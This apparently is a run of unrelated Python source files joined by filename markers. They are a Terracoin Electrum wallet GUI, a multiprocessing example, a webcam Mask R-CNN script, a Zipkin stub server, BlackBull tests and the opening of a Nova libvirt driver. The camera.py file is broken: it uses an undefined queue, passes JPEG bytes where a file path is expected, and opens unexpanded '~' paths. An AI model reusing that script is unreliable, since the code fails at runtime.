self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
elif event == 'verified-islock':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_trc.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sats/kB
return format_fee_satoshis(fee_rate) + ' sats/kB'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Terracoin Electrum', message,
app_icon=icon, app_name='Terracoin Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
@property
def testnet(self):
return self.electrum_config.get('testnet')
@property
def app_icon(self):
return ATLAS_ICON % ('logo-testnet' if self.testnet else 'logo')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
if self.network:
self.network.stop()
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.network:
self.network.start([self.fx.run])
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum_trc/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum_trc/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum_trc/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') +
':\n' + _('Electrum network not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
multiproc04.py
|
from multiprocessing import Process, Pipe
def f(conn):
conn.send([42, None, 'hello'])
conn.close()
if __name__ == '__main__':
parent_conn, child_conn = Pipe()
p = Process(target=f, args=(child_conn,))
p.start()
print(parent_conn.recv()) # prints "[42, None, 'hello']"
p.join()
|
camera.py
|
#!/usr/bin/env python
# coding:utf-8
import os
import cv2
import time
import utils
import threading
import collections
import requests
import numpy as np
import argparse
import random
import os
#from profilehooks import profile # pip install profilehooks
class Fps(object):
def __init__(self, buffer_size=15):
self.last_frames_ts = collections.deque(maxlen=buffer_size)
self.lock = threading.Lock()
def __call__(self):
with self.lock:
len_ts = self._len_ts()
if len_ts >= 2:
return len_ts / (self._newest_ts() - self._oldest_ts())
return None
def _len_ts(self):
return len(self.last_frames_ts)
def _oldest_ts(self):
return self.last_frames_ts[0]
def _newest_ts(self):
return self.last_frames_ts[-1]
def new_frame(self):
with self.lock:
self.last_frames_ts.append(time.time())
def get_fps(self):
return self()
class Camera(object):
__metaclass__ = utils.Singleton
def __init__(self, quality=80, width=640, height=480, threads=3):
self.quality = quality
# Using OpenCV to capture from device 0. If you have trouble capturing
# from a webcam, comment the line below out and use a video file
# instead.
self.video = cv2.VideoCapture(0)
# If you decide to use video.mp4, you must have this file in the folder
# as the main.py.
# self.video = cv2.VideoCapture('video.mp4')
self.font = cv2.FONT_HERSHEY_SIMPLEX
self.camera_fps = Fps(50)
self.network_fps = Fps(25)
self.prepare_frame_queue = utils.RenewQueue()
self.request_image_queue = utils.RenewQueue()
self.video.set(3, width)
self.video.set(4, height)
self.width = int(self.video.get(3))
self.height = int(self.video.get(4))
print('%sx%s' % (self.width, self.height))
self.get_frame_thread = threading.Thread(target=self.run_get_frame, name='get_frame')
self.get_frame_thread.daemon = True
self.get_frame_thread.start()
self.prepare_frame_thread = threading.Thread(target=self.run_prepare_frame, name='prepare_frame')
self.prepare_frame_thread.daemon = True
self.prepare_frame_thread.start()
def __del__(self):
self.video.release()
def run_get_frame(self):
while True:
frame = self.get_frame()
self.identify_faces_queue.put(frame)
self.prepare_frame_queue.put(frame)
def run_prepare_frame(self):
while True:
frame = self.prepare_frame_queue.get()
self.prepare_frame(frame)
image = self.encode_frame_to_jpeg(frame)
self.request_image_queue.put(image)
def script_path(self):
return os.path.dirname(os.path.realpath(__file__))
@staticmethod
def send_to_influxdb(url, payload):
try:
requests.post(url, data=payload.encode())
except Exception as e:
print("Unable to write into InfluxDB: %s" % e)
pass
def draw_fps(self, frame):
camera_fps = self.camera_fps()
if camera_fps is not None:
cv2.putText(frame, '{:5.2f} camera fps'.format(camera_fps),(10,self.height-50), self.font, 0.6, (250,25,250), 2)
network_fps = self.network_fps()
if network_fps is not None:
cv2.putText(frame, '{:5.2f} effective fps'.format(network_fps),(10,self.height-30), self.font, 0.6, (250,25,250), 2)
def draw_date(self, frame):
cv2.putText(frame, time.strftime("%c"), (10,20), self.font, 0.6,(250,25,250), 2)
#@profile
def get_frame(self):
success, frame = self.video.read()
self.camera_fps.new_frame()
return frame
#@profile
def encode_frame_to_jpeg(self, frame):
# We are using Motion JPEG, but OpenCV defaults to capture raw images,
# so we must encode it into JPEG in order to correctly display the
# video stream.
ret, jpeg = cv2.imencode('.jpg', frame,(cv2.IMWRITE_JPEG_QUALITY, self.quality))
return jpeg.tobytes()
#@profile
def prepare_frame(self, frame):
self.draw_fps(frame)
self.draw_date(frame)
#@profile
def request_image(self):
image = self.request_image_queue.get()
img=classify(image)
self.network_fps.new_frame()
return img
def mjpeg_generator(self):
"""Video streaming generator function."""
while True:
image = self.request_image()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + image + b'\r\n')
def classify(image1):
# load the COCO class labels our Mask R-CNN was trained on
labelsPath = os.path.sep.join(["~/mask-rcnn-coco","object_detection_classes_coco.txt"])
LABELS = open(labelsPath).read().strip().split("\n")
# load the set of colors that will be used when visualizing a given
# instance segmentation
colorsPath = os.path.sep.join(["~/mask-rcnn-coco", "colors.txt"])
COLORS = open(colorsPath).read().strip().split("\n")
COLORS = [np.array(c.split(",")).astype("int") for c in COLORS]
COLORS = np.array(COLORS, dtype="uint8")
# derive the paths to the Mask R-CNN weights and model configuration
weightsPath = os.path.sep.join(["~/mask-rcnn-coco","frozen_inference_graph.pb"])
configPath = os.path.sep.join(["~/mask-rcnn-coco","mask_rcnn_inception_v2_coco_2018_01_28.pbtxt"])
# load our Mask R-CNN trained on the COCO dataset (90 classes)
# from disk
print("[INFO] loading Mask R-CNN from disk...")
net = cv2.dnn.readNetFromTensorflow(weightsPath, configPath)
# load our input image and grab its spatial dimensions
image = cv2.imread(image1)
(H, W) = image.shape[:2]
# construct a blob from the input image and then perform a forward
# pass of the Mask R-CNN, giving us (1) the bounding box coordinates
# of the objects in the image along with (2) the pixel-wise segmentation
# for each specific object
blob = cv2.dnn.blobFromImage(image, swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
(boxes, masks) = net.forward(["detection_out_final", "detection_masks"])
end = time.time()
# show timing information and volume information on Mask R-CNN
print("[INFO] Mask R-CNN took {:.6f} seconds".format(end - start))
print("[INFO] boxes shape: {}".format(boxes.shape))
print("[INFO] masks shape: {}".format(masks.shape))
# loop over the number of detected objects
for i in range(0, boxes.shape[2]):
# extract the class ID of the detection along with the confidence
# (i.e., probability) associated with the prediction
classID = int(boxes[0, 0, i, 1])
confidence = boxes[0, 0, i, 2]
# filter out weak predictions by ensuring the detected probability
# is greater than the minimum probability
if confidence > 0.5:
# clone our original image so we can draw on it
clone = image.copy()
# scale the bounding box coordinates back relative to the
# size of the image and then compute the width and the height
# of the bounding box
box = boxes[0, 0, i, 3:7] * np.array([W, H, W, H])
(startX, startY, endX, endY) = box.astype("int")
boxW = endX - startX
boxH = endY - startY
# extract the pixel-wise segmentation for the object, resize
# the mask such that it's the same dimensions of the bounding
# box, and then finally threshold to create a *binary* mask
mask = masks[i, classID]
mask = cv2.resize(mask, (boxW, boxH),
interpolation=cv2.INTER_NEAREST)
mask = (mask > 0.3)
# extract the ROI of the image
roi = clone[startY:endY, startX:endX]
# now, extract *only* the masked region of the ROI by passing
# in the boolean mask array as our slice condition
roi = roi[mask]
# randomly select a color that will be used to visualize this
# particular instance segmentation then create a transparent
# overlay by blending the randomly selected color with the ROI
color = random.choice(COLORS)
blended = ((0.4 * color) + (0.6 * roi)).astype("uint8")
# store the blended ROI in the original image
clone[startY:endY, startX:endX][mask] = blended
# draw the bounding box of the instance on the image
color = [int(c) for c in color]
cv2.rectangle(clone, (startX, startY), (endX, endY), color, 2)
# draw the predicted label and associated probability of the
# instance segmentation on the image
text = "{}: {:.4f}".format(LABELS[classID], confidence)
cv2.putText(clone, text, (startX, startY - 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
return clone
def main():
print(Camera().request_image())
if __name__ == "__main__":
main()
|
zipkinStubServer.py
|
from bottle import post, Bottle, request
import json
import socket, struct
import queue
from threading import Thread
import server
class Span:
def __init__(self):
self.id = -1
self.name = ''
self.timestamp = -1
self.traceId = ''
self.duration = ''
self.parentId = ''
self.annotations = []
self.binaryAnnotations = []
class EndPoint:
def __init__(self):
self.ipv4 = ''
self.port = -1
self.serviceName = ''
class Annotation:
def __init__(self):
self.endpoint = EndPoint()
self.timestamp = -1
self.value = ""
class BinaryAnnotation:
def __init__(self):
self.endpoint = EndPoint()
self.key = ""
self.value = ""
class JsonEncoder:
spanAttributeList = ['name', 'id', 'timestamp', 'traceId', 'duration']
annotationAttributeList = ['timestamp', 'value']
binaryAnnotationAttributeList = ['key', 'value']
@staticmethod
def fromRawToEndPoint( endPointRawData):
endpoint = EndPoint()
endpoint.ipv4 = endPointRawData['ipv4']
endpoint.port = endPointRawData['port']
endpoint.serviceName = endPointRawData['serviceName'].encode('ascii', 'ignore')
return endpoint
@staticmethod
def fromRawToAnnotation( annotationRawData ):
annotation = Annotation()
for attribute in JsonEncoder.annotationAttributeList:
setattr(annotation, attribute, annotationRawData[attribute])
annotation.endpoint = JsonEncoder.fromRawToEndPoint( annotationRawData['endpoint'])
return annotation
@staticmethod
def fromRawToBinaryAnnotation( binaryAnnotationRawData ):
binaryAnnotation = BinaryAnnotation()
for attribute in JsonEncoder.binaryAnnotationAttributeList:
setattr(binaryAnnotation, attribute, binaryAnnotationRawData[attribute])
binaryAnnotation.endpoint = JsonEncoder.fromRawToEndPoint( binaryAnnotationRawData['endpoint'])
return binaryAnnotation
@staticmethod
def fromRawToSpan( spanRawData ):
span = Span()
for attribute in JsonEncoder.spanAttributeList:
setattr(span, attribute, spanRawData[attribute])
span.parentId = spanRawData.get('parentId', '')
for annotationData in spanRawData['annotations']:
annotation = JsonEncoder.fromRawToAnnotation( annotationData )
span.annotations.append(annotation)
for binaryAnnotationData in spanRawData['binaryAnnotations']:
binaryAnnotation = JsonEncoder.fromRawToBinaryAnnotation( binaryAnnotationData )
span.binaryAnnotations.append(binaryAnnotation)
return span
@staticmethod
def fromJson( data ):
spans = []
rawData = json.JSONDecoder().decode(data.decode('utf-8'))
for spanRawData in rawData:
spans.append(JsonEncoder.fromRawToSpan( spanRawData ))
return spans
class ZipkinStubServer(object):
def __init__(self, port = 9411):
self._port = port
self._messageQueue = queue.Queue()
self._running = False
self._thread = None
self.outQueue = None
self.startEvent = None
self._app = Bottle()
self._app.route(path = '/api/v1/spans', method = 'POST', callback = self.handleSpans)
self._server = server.WSGIRefServerStoppable(host = 'localhost', port = port)
def stop(self):
self._running = False
self._messageQueue.put(('',''))
self._thread.join()
self._server.stop()
def start(self):
self._running = True
self._thread = Thread(None, self.eventLoop, 'event loop', (), {})
self._thread.start()
self.startEvent.set()
self._app.run(server = self._server)
def handleSpans(self):
contentType = request.headers.get('Content-Type')
a = request.body.readlines()
self._messageQueue.put((contentType, a))
def eventLoop(self):
while self._running == True:
try:
message = self._messageQueue.get(True)
if message[0] == 'application/json':
spans = JsonEncoder.fromJson(message[1][0])
self.outQueue.put( spans )
except queue.Empty:
pass
@staticmethod
def spawn(server, outQueue, startEvent):
server.outQueue = outQueue
server.startEvent = startEvent
server.start()
class ServerGuard:
def __init__(self, entryPoint, *args):
self._thread = None
self._entryPoint = entryPoint
self._args = args
def __enter__(self):
self._thread = Thread( target = self._entryPoint, args=self._args )
self._thread.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self._thread.join()
|
test_BlackBull.py
|
from http import HTTPStatus
import ssl
import pathlib
from blackbull.logger import get_logger_set
# Library for test-fixture
from multiprocessing import Process
import asyncio
import pytest
# Test targets
from blackbull import BlackBull, Response, WebSocketResponse
from blackbull.utils import Scheme, HTTPMethods
# from blackbull.middlewares import websocket
# Library for tests
import httpx
import websockets
logger, log = get_logger_set()
def run_application(app):
logger.info('dummy is called.')
loop = asyncio.new_event_loop()
task = loop.create_task(app.run())
loop.run_until_complete(task)
@pytest.fixture
async def app():
# run before the test
logger.info('At set-up.')
app = BlackBull()
cd = pathlib.Path(__file__).parent
app.create_server(certfile=cd / 'cert.pem', keyfile=cd / 'key.pem')
# Routing not using middleware.
@app.route(path='/test')
async def test_(scope, receive, send):
logger.debug(f'test_({scope}, {receive}, {send})')
await Response(send, 'sample')
@app.route_404
async def test_404(scope, receive, send):
logger.debug(f'test_404({scope}, {receive}, {send})')
await Response(send, 'not found test.', status=HTTPStatus.NOT_FOUND)
# Routing using middleware.
async def test_fn1(scope, receive, send, inner):
logger.info('test_fn1 starts.')
res = await inner(scope, receive, send)
logger.info(f'test_fn1 ends. res = {res}')
await Response(send, res + 'fn1')
async def test_fn2(scope, receive, send, inner):
logger.info('test_fn2 starts.')
res = await inner(scope, receive, send)
logger.info(f'test_fn2 ends. res = {res}')
return res + 'fn2'
async def test_fn3(scope, receive, send, inner):
logger.info('test_fn3 starts.')
await inner(scope, receive, send)
logger.info('test_fn3 ends.')
return 'fn3'
app.route(methods='get', path='/test2', functions=[test_fn1, test_fn2, test_fn3])
@app.route(path='/websocket1', scheme=Scheme.websocket)
async def websocket1(scope, receive, send):
accept = {"type": "websocket.accept", "subprotocol": None}
# msg = await receive()
await send(accept)
while msg := (await receive()):
if 'text' in msg:
logger.debug(f'Got a text massage ({msg}.)')
elif 'bytes' in msg:
logger.debug(f'Got a byte-string massage ({msg}.)')
else:
logger.info('The received message does not contain any message.')
break
await WebSocketResponse(send, msg)
await send({'type': 'websocket.close'})
async def websocket2(scope, receive, send):
while msg := (await receive()):
await WebSocketResponse(send, msg)
app.route(path='/websocket2', scheme=Scheme.websocket,
functions=[websocket2])
@app.route(path='/push', methods=[HTTPMethods.post])
async def server_push(scope, receive, send):
# await Response(send, 'Any message?', more_body=True)
request = await receive()
while request['type'] != 'http.disconnect' and request['body'] != 'Bye':
msg = request['body']
await Response(send, msg, more_body=True)
try:
request = await asyncio.wait_for(receive(), timeout=0.5)
except asyncio.TimeoutError:
logger.debug('Have not received any message in this second.')
await Response(send, 'Any message?', more_body=True)
p = Process(target=run_application, args=(app,))
p.start()
yield app
logger.info('At teardown.')
app.stop()
p.terminate()
@pytest.fixture
async def ssl_context():
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
logger.info(pathlib.Path(__file__))
localhost_pem = pathlib.Path(__file__).with_name("cert.pem")
ssl_context.load_verify_locations(localhost_pem)
yield ssl_context
# At tear down.
pass
@pytest.fixture
async def ssl_h2context():
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
logger.info(pathlib.Path(__file__))
localhost_pem = pathlib.Path(__file__).with_name("cert.pem")
ssl_context.load_verify_locations(localhost_pem)
ssl_context.set_alpn_protocols(['h2'])
yield ssl_context
# At tear down.
pass
# @pytest.mark.asyncio
# async def test_response_200(app):
# async with httpx.AsyncClient(http2=True, verify=False) as c:
# res = await c.get(f'https://localhost:{app.port}/test', headers={'key': 'value'})
# assert res.status_code == 200
# @pytest.mark.asyncio
# async def test_response_404_fn(app):
# async with httpx.AsyncClient(http2=True, verify=False) as c:
# res = await c.get(f'https://localhost:{app.port}/badpath', headers={'key': 'value'})
# assert res.status_code == 404
# assert res.content == b'not found test.'
# @pytest.mark.asyncio
# async def test_routing_middleware(app):
# async with httpx.AsyncClient(http2=True, verify=False) as c:
# res = await c.get(f'https://localhost:{app.port}/test2', headers={'key': 'value'})
# assert res.status_code == 200
# assert res.content == b'fn3fn2fn1'
@pytest.mark.asyncio
async def test_websocket_response(app, ssl_context):
uri = f"wss://localhost:{app.port}/websocket1"
async with websockets.connect(uri, ssl=ssl_context) as client:
logger.debug('Websocket has been connected.')
name = 'Toshio'
await asyncio.wait_for(client.send(name), timeout=0.1)
logger.info('Have sent.')
response = await asyncio.wait_for(client.recv(), timeout=0.1)
assert response == name
# @pytest.mark.asyncio
# async def test_http2_server_push(app, ssl_context):
# uri = f'127.0.0.1:{app.port}'
# msg = b'hello'
# with HTTPConnection(uri, secure=True, enable_push=True, ssl_context=ssl_context) as conn:
# conn.request('post', '/http2', body=msg)
# for push in conn.get_pushes(): # all pushes promised before response headers
# logger.info(push.path)
# response = conn.get_response()
# assert response.read() == msg
# for push in conn.get_pushes(): # all other pushes
# logger.info(push.path)
|
driver.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
**Related Flags**
:libvirt_type: Libvirt domain type. Can be kvm, qemu, uml, xen
(default: kvm).
:libvirt_uri: Override for the default libvirt URI (depends on libvirt_type).
:libvirt_disk_prefix: Override the default disk prefix for the devices
attached to a server.
:rescue_image_id: Rescue ami image (None = original image).
:rescue_kernel_id: Rescue aki image (None = original image).
:rescue_ramdisk_id: Rescue ari image (None = original image).
:injected_network_template: Template file for injected network
:allow_same_net_traffic: Whether to allow in project network traffic
"""
import errno
import eventlet
import functools
import glob
import os
import shutil
import socket
import sys
import tempfile
import threading
import time
import uuid
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
from xml.dom import minidom
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common.notifier import api as notifier
from nova.openstack.common import processutils
from nova import utils
from nova import version
from nova.virt import configdrive
from nova.virt.disk import api as disk
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt import netutils
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
default=None,
help='Rescue ami image'),
cfg.StrOpt('rescue_kernel_id',
default=None,
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
default=None,
help='Rescue ari image'),
cfg.StrOpt('libvirt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('libvirt_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on libvirt_type)'),
cfg.BoolOpt('libvirt_inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
